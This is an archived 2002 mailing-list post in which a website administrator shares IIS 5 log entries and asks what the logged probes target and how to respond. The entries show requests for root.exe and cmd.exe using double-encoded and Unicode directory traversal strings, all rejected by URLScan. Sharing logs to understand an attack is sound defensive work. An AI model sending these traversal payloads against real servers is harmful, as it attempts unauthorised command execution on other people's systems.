IIS 5 Log FIle Question

Craig Brauckmiller Sun, 12 May 2002 17:20:21 -0700

Hello all and forgive my ignorance in this area.

We are in the process of bringing our website in house.  It 
was being hosted
externally
The site is almost up and I was just poking at the logs and 
was intrigued by
what I saw.

Below is a snippet from the logs.  Can anyone tell by 
looking at it:

1.  What type of vulnerabilities were they looking for?
2.  Does the fact the it says <Rejected by urlscan> imply 
that URLScan from M$
is loaded.  I didn't do this myself...thats why I'm curious.
3.  What is the best course of action in regards to the 
individual attempting
these activities?  I traced the IP back to RoadRunner.  
Should I call their
customer service and complain or am I just pissing in the 
wind?
4.  I did run the IIS Lockdown wizard.  Is that sufficient 
for most types of
attacks?  What other tools should I consider running?

#Fields: date time c-ip cs-username s-ip s-port cs-method 
cs-uri-stem
cs-uri-query sc-status sc-win32-status cs(User-Agent)
2002-05-10 02:27:00 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/scripts/root.exe 404 123 -
2002-05-10 02:27:00 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/MSADC/root.exe 404 123 -
2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/c/winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/d/winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/scripts/..%255c../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/_vti_bin/..%255c../..%255c../..%
255c../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/_mem_bin/..%255c../..%255c../..%
255c../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:03 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%
1c../..%c1%1c../winnt/system32/cmd.exe

404 123 -
2002-05-10 02:27:03 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/scripts/..%c1%1c../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:04 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/scripts/..%c0%2f../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:04 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/scripts/..%c0%af../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:05 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/scripts/..%c1%9c../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:09 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/scripts/..%%35%63../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:11 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/scripts/..%%35c../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:12 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/scripts/..%25%35%63../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:12 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/scripts/..%252f../winnt/system32/cmd.exe 404 123 -

Thanks so much for this great list.

Craig Brauckmiller
IIS 5 Log FIle Question

Reply via email to
